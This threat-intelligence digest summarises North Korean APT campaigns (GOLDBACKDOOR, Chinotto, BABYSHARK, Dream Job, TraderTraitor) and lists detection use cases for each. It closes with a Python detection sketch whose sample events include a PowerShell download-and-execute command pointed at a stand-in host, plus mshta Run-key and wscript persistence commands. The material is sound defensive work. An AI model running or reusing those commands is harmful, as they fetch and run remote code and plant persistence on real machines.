APT37 Targeting Journalists and Researchers

May 03, 2022

Industry: Media | Level: Tactical | Source: Stairwell

NK News, an American news source reporting on activities in North Korea, has identified suspicious spear-phishing emails as a threat campaign by the North Korean threat group APT37/Ricochet Chollima. The campaign appears to be targeting journalists and researchers reporting on sensitive issues within the country. The news organization engaged Stairwell’s cybersecurity team in March 2022, which discovered a new malware named GOLDBACKDOOR. The threat group employs a multi-stage infection process to evade defenses. A compressed file attached to the suspicious email contains Windows LNK (shortcut) files. When the shortcut files are executed, PowerShell scripts are launched that present a decoy document to distract the victim whilst downloading and executing malicious shellcode. The downloaded payload, Fantasy, then conducts process injection to deploy the GOLDBACKDOOR malware. GOLDBACKDOOR is identified as a Windows Portable Executable (PE) file with a creation timestamp of February 9th, 2022, 02:38:30 UTC. As analyzed by Stairwell, “Embedded in the analyzed copy of GOLDBACKDOOR is a set of API keys used to authenticate against Azure and retrieve commands for execution. Received commands are prefixed with a single-character value, which denotes the corresponding task requested of the malware. GOLDBACKDOOR provides attackers with basic remote command execution, file downloading/uploading, keylogging, and the ability to remotely uninstall.”

  • Anvilogic Scenario: APT37 – GOLDBACKDOOR – Initial Infection
  • Anvilogic Use Cases:
    • Compressed File Execution
    • Symbolic OR Hard File Link Created
    • Suspicious Executable by CMD.exe
    • Invoke-Expression Command
    • Rare Remote Thread

North Korean APT Groups Target Blockchain and Cryptocurrency Companies

April 19, 2022

Industry: Blockchain, Cryptocurrency | Level: Tactical | Source: CISA

The Cybersecurity and Infrastructure Security Agency (CISA), in a joint advisory with the Federal Bureau of Investigation (FBI) and the U.S. Treasury Department (Treasury), warns that state-sponsored advanced persistent threat (APT) groups from North Korea are targeting various organizations in blockchain technology and cryptocurrency. The APT groups include Lazarus Group, APT38, BlueNoroff, and Stardust Chollima. The threat groups’ campaigns have involved using social engineering tactics to lure victims on Windows or macOS platforms into downloading trojanized cryptocurrency applications. The phishing themes used by the APT groups have involved lucrative job opportunities to entice victims. Once the malicious application is executed, the cyber actors are able to infiltrate the victim’s host and propagate within their environment to steal credentials, exploit additional security gaps, and/or initiate fraudulent transactions. The United States government has referred to the campaigns with malicious cryptocurrency applications as “TraderTraitor,” explaining that “The term TraderTraitor describes a series of malicious applications written using cross-platform JavaScript code with the Node.js runtime environment using the Electron framework. The malicious applications are derived from a variety of open-source projects and purport to be cryptocurrency trading or price prediction tools. TraderTraitor campaigns feature websites with modern design advertising the alleged features of the applications.”

  • Anvilogic Use Cases:
    • AVL_UC1053 – Web Application File Upload
    • AVL_UC1029 – Wscript/Cscript Execution
    • AVL_UC1040 – Executable File Written to Disk
    • AVL_UC1043 – Command and Control Detection

Lazarus Operation Dream Job

April 19, 2022

Industry: Chemical & Information Technology | Level: Tactical | Source: Symantec

Symantec’s tracking of Lazarus, a North Korean advanced persistent threat (APT), has identified activity targeting the chemical and information technology sectors in South Korea under Operation Dream Job, observed since January 2022. Although the information technology sector was targeted, it’s believed the attacks were intended to pivot to the chemical sector. The Operation Dream Job campaign has been active since August 2020, luring victims with fictitious job postings targeting various sectors. A typical attack chain from the campaign has involved the execution of an HTM file to download a malicious DLL file that is injected into a process; Symantec has identified process injection into “legitimate system management software INISAFE Web EX Client.” Additional activities observed included credentials obtained by dumping registry keys, executing a BAT file, and creating scheduled tasks for persistence.

  • Anvilogic Scenario: Lazarus – Operation Dream Job – Target Chemical Sector
  • Anvilogic Use Cases:
    • Rundll32 Command Line
    • Create/Modify Schtasks
    • Suspicious File written to Disk
    • Windows FTP Exfiltration
    • Credentials in Registry
    • Executable Create Script Process
    • Rare remote thread
    • Control Panel Abuse

Google TAG Identifies Threats from North Korea

March 29, 2022

Industry: Financial Services, Cryptocurrency, Information Technology, Media | Level: Strategic | Source: Google TAG

Research from Google’s Threat Analysis Group (TAG) has been tracking activity from two North Korean threat groups since February 10th. The associated threat campaigns are publicly named “Operation Dream Job” (active since at least June 2020) and “Operation AppleJeus” (active since 2018), as the lures utilize employment themes. The two campaigns target different industries: “Operation Dream Job” has been observed targeting media and technology (hosting providers and software companies), and “Operation AppleJeus” targets financial services, specifically cryptocurrency and fintech organizations. The tactics, techniques and procedures utilized by both campaigns leverage the same exploit kit, which involves a Google Chrome remote code execution (RCE) vulnerability, CVE-2022-0609. The phishing site utilizes an iframe that conducts system checks on the victim, collecting the requirements needed for the RCE exploit to succeed; in addition, a JavaScript payload could escape Chrome’s sandbox protection. In order to evade security researchers, the attackers were cautious in their campaign: they only served the iframe during specific times, implemented a one-time-click policy, and ensured exploits would only work if the requirements were met.

Targeted BABYSHARK Attack on Think Tank

March 08, 2022

Industry: Think Tank | Level: Tactical | Source: Huntress

A report from Huntress identified threat activity targeting a security think tank, attributed to North Korean threat actors using the BABYSHARK malware strain. The initial sign of malicious activity was a fraudulent GoogleUpdater scheduled task that runs a malicious vbs file using wscript to download a file hosted on Google Drive. The attack was heavily targeted to this organization: a system check performed by the file normal.crp only continued execution if the username was “Administrator” or a particular user. The following is noted by Huntress (the mentioned user “Bob” is fictitious to maintain anonymity): “This attack was tailored to focus only on Bob. If (and only if) the username matched Bob, then it would add persistence mechanisms in the Windows registry, stage new obfuscated files, and continue communications with its C2 servers.” Further investigation identified the origin of the attack as a phishing email containing a malicious link.

  • Anvilogic Use Cases:
    • Create/Modify Schtasks
    • Suspicious Registry Key Created
    • Wscript/Cscript Execution

Stardust Chollima

November 24, 2021

Industry: N/A | Level: Strategic | Source: DailyBeast

Observed by CrowdStrike, North Korean hackers designated as “Stardust Chollima” are suspected of going after Chinese security researchers with the objective of stealing their hacking techniques. In June 2021, phishing emails were distributed containing malicious attachments titled “Securitystatuscheck.zip” and “_signed.pdf.” The emails contained references to China’s Ministry of Public Security and the National Information Security Standardization Technical Committee. The motive appears to be for the threat group to obtain new techniques, and particularly zero days, for offensive campaigns. It is currently unknown whether there were any victims.

APT37 and Chinotto Malware

November 24, 2021

Industry: Media & Nonprofit | Level: Tactical | Source: SecureList

The North Korean nation-state sponsored group APT37/ScarCruft/Temp.Reaper has been identified by Kaspersky as targeting South Korean journalists, defectors, and human rights activists. The group utilized the Chinotto malware, distributed through watering holes, spear-phishing emails, and smishing attacks. A news organization had data stolen, and evidence showed the attackers had access to its environment for several months. Versions of the malware were observed for PowerShell, Windows, and Android, with similar HTTP-based command and control schemes. Additional capabilities observed include the ability to modify registry keys (specifically enabling trust access for VBA), register a PowerShell command in the Run registry key for persistence that executes an HTA file with mshta, and collect files staged in a bat folder.

  • Anvilogic Scenario: APT37 & “Chinotto” Malware
  • Anvilogic Use Cases:
    • Query Registry
    • New AutoRun Registry Key
    • MSHTA.exe execution
    • Data Staged to File
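As an added example that is not part of the original reports or of Anvilogic's own detection content, the following Python sketches detection logic for three behaviours described on this page (the GOLDBACKDOOR LNK-to-PowerShell chain, the BABYSHARK scheduled task running wscript, and the Chinotto Run-key/mshta persistence) and runs it over constructed Sysmon-style events; the field names, paths, task and file names are assumptions.

```python
import re

# Constructed sample telemetry (not real logs): Sysmon-style process-creation
# ("pc") and registry-value-set ("reg") events. Field names are assumptions.
EVENTS = [
    {"type": "pc", "image": r"C:\Windows\explorer.exe", "parent": "", "cmd": "explorer.exe"},
    {"type": "pc", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmd": "powershell -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')\""},
    {"type": "pc", "image": r"C:\Windows\System32\wscript.exe",
     "parent": r"C:\Windows\System32\svchost.exe",
     "parent_cmd": "svchost.exe -k netsvcs -p -s Schedule",
     "cmd": r"wscript.exe //B C:\Users\bob\AppData\Roaming\update.vbs"},
    {"type": "reg", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "data": r'powershell -c "mshta C:\Users\bob\AppData\Local\Temp\a.hta"'},
    {"type": "pc", "image": r"C:\Windows\System32\wscript.exe",
     "parent": r"C:\Windows\explorer.exe", "cmd": r"wscript.exe C:\Users\bob\login.vbs"},
]

IEX_RE = re.compile(r"\b(iex|invoke-expression)\b", re.I)
VBS_IN_PROFILE_RE = re.compile(r"\\users\\[^\\]+\\.*\.vbs\b", re.I)

def explorer_powershell_iex(e):
    """A double-clicked LNK shows up as explorer.exe -> powershell.exe; flag it
    when the command line also carries Invoke-Expression (GOLDBACKDOOR chain)."""
    return (e["type"] == "pc" and e["image"].lower().endswith("powershell.exe")
            and e["parent"].lower().endswith("explorer.exe")
            and IEX_RE.search(e["cmd"]) is not None)

def scheduled_task_wscript_vbs(e):
    """wscript.exe running a .vbs from a user profile, started by the Task Scheduler
    service host (the fraudulent GoogleUpdater task in the BABYSHARK entry)."""
    return (e["type"] == "pc" and e["image"].lower().endswith("wscript.exe")
            and "-s schedule" in e.get("parent_cmd", "").lower()
            and VBS_IN_PROFILE_RE.search(e["cmd"]) is not None)

def run_key_mshta(e):
    """Run-key value that launches PowerShell to run mshta on an .hta (Chinotto entry)."""
    data = e.get("data", "").lower()
    return (e["type"] == "reg" and "\\currentversion\\run\\" in e["key"].lower()
            and "mshta" in data and ".hta" in data)

RULES = {"explorer_powershell_iex": explorer_powershell_iex,
         "scheduled_task_wscript_vbs": scheduled_task_wscript_vbs,
         "run_key_mshta": run_key_mshta}

def run_rules(events=EVENTS):
    """Return (rule name, event index) for every event that trips a rule."""
    return [(name, i) for i, e in enumerate(events) for name, fn in RULES.items() if fn(e)]
```

The last sample event (wscript launched directly from explorer.exe) is deliberately left unmatched so the parent-process condition in the scheduled-task rule is exercised.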